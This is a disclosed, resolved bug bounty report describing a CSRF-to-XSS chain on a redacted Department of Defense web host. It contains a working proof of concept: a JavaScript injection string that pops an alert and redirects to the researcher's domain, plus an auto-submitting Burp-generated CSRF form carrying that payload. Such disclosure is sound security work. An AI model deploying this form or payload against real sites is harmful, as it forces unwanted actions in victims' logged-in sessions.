CSRF to XSS

Disclosed: 2024-12-18 19:43:14 By k0x To deptofdefense
Medium
Vulnerability Details
Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) are two distinct attack vectors, but when combined, they can significantly increase the impact of an attack. - **XSS (Cross-Site Scripting):** In an XSS attack, an attacker injects malicious scripts (typically JavaScript) into a trusted website. These scripts are then executed in the victim's browser without their knowledge. This allows attackers to steal sensitive data like cookies, session tokens, or perform actions on behalf of the user. - **CSRF (Cross-Site Request Forgery):** CSRF tricks a victim into performing unwanted actions on a web application where they are authenticated. When combined with XSS, attackers can bypass CSRF defenses by using the victim's active session to perform actions like changing account details, transferring funds, or modifying settings. ## Impact - **Stealing Authentication Tokens:** XSS can steal session cookies, making it easier to forge authenticated requests via CSRF. - **Automating Malicious Actions:** XSS can directly create malicious requests, such as submitting forms or performing transactions, bypassing CSRF protections and leading to unauthorized actions on behalf of the victim. - **Higher Attack Success Rate:** When XSS and CSRF are combined, even CSRF tokens can be stolen and used, making it very hard for applications to prevent such attacks. ## System Host(s) www.█████ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce **Step 1:** Malicious JavaScript Payload The following JavaScript code represents a payload that an attacker could use to steal cookies: ```javascript video"); alert('Hacked by k0x'); setTimeout(()=>location.href='████',5000);// ``` **Step 2:** Malicious Website for CSRF An attacker crafts a malicious Website to exploit the CSRF vulnerability. When a user clicks the link, it triggers a request to the vulnerable application (It could be redirected without a click): ```html <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://www.████████/alerts" method="POST"> <input type="hidden" name="csrf&#95;token" value="75ce3b80fbeb820dc230d2cf674283a5" /> <input type="hidden" name="alerts&#95;invite&#95;id" value="" /> <input type="hidden" name="hash" value="" /> <input type="hidden" name="search&#95;type" value="content" /> <input type="hidden" name="search" value="kaos" /> <input type="hidden" name="phrase" value="0" /> <input type="hidden" name="phrase" value="1" /> <input type="hidden" name="features&#95;name" value="" /> <input type="hidden" name="features&#95;input" value="" /> <input type="hidden" name="feed&#95;channels&#95;name" value="" /> <input type="hidden" name="feed&#95;channels&#95;input" value="" /> <input type="hidden" name="radius&#95;name" value="" /> <input type="hidden" name="radius&#95;input" value="" /> <input type="hidden" name="radius&#95;range" value="10" /> <input type="hidden" name="state&#95;name" value="&#45;1" /> <input type="hidden" name="state&#95;input" value="" /> <input type="hidden" name="hometown&#95;name" value="" /> <input type="hidden" name="hometown&#95;input" value="" /> <input type="hidden" name="personnel&#95;name" value="" /> <input type="hidden" name="personnel&#95;input" value="" /> <input type="hidden" name="publication&#95;name" value="" /> <input type="hidden" name="publication&#95;input" value="" /> <input type="hidden" name="series&#95;name" value="&#45;1" /> <input type="hidden" name="series&#95;input" value="" /> <input type="hidden" name="tags&#95;name" value="" /> <input type="hidden" name="tags&#95;input" value="" /> <input type="hidden" name="unit&#95;name" value="" /> <input type="hidden" name="unit&#95;input" value="" /> <input type="hidden" name="source&#91;&#93;" value="video&quot;&#41;&#59;&#13;&#10;alert&#40;&apos;Hacked&#32;by&#32;k0x&apos;&#41;&#59;&#13;&#10;setTimeout&#40;&#40;&#41;&#61;&gt;location&#46;href&#61;&apos;https&#58;&#47;&#47;k0x&#46;xyz&apos;&#44;5000&#41;&#59;&#47;&#47;" /> <input type="hidden" name="freq" value="hourly" /> <input type="hidden" name="delivery&#95;method" value="email" /> <input type="hidden" name="member&#95;email&#95;id" value="1223198" /> <input type="hidden" name="submit" value="CREATE&#32;NEWSWIRE" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> ``` **Step 3:** Recreate Attack Flow 1. **User Logs In:** The victim logs into the vulnerable application, maintaining an active session. 2. **Clicking the Malicious Link:** The victim receives a message or email with the malicious link. Upon clicking, they are redirected to the attacker's controlled site. 3. **CSRF Exploitation:** The malicious link triggers a CSRF attack that executes the injected JavaScript payload, which may steal cookies or perform unauthorized actions. 4. **Payload Execution:** The attacker can use the stolen cookies or perform actions such as changing account settings, transferring funds, etc. ## Suggested Mitigation/Remediation Actions
Actions
View on HackerOne
Report Stats
  • Report ID: 2736979
  • State: Closed
  • Substate: resolved
  • Upvotes: 1
Share this report